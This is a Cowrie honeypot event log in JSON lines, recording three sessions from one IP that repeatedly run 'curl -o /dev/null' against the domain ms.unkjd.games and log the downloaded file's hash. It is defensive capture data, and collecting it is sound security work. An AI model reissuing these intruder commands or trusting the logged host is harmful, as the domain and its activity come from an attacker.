{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.832407Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.832808Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.834424Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.834798Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.883612Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.928020Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.928494Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.929848Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.930347Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.938913Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.979176Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:09.979864Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:09.999591Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.004033Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.025489Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.030965Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.061093Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.066789Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.069581Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.106486Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.118545Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.121228Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.121855Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.124544Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.154773Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.157250Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.241242Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.241760Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.278812Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.282856Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.285600Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.289965Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.305907Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.355907Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.359160Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.362777Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.365539Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.418988Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.425872Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.427098Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.434087Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.445806Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.469179Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.470486Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.504097Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.505575Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.520562Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.521670Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.522278Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.524589Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.563904Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.565717Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.567338Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:10.568229Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:10.568670Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.055526Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.056346Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.075734Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.093122Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.093957Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.096035Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.096853Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.124956Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.125775Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.130440Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.131288Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.156623Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.157425Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.161373Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.163840Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.172188Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.172834Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.176273Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.179426Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.181110Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.199094Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.199694Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.209632Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.210616Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.211126Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.237948Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:11.238758Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:11.241097Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
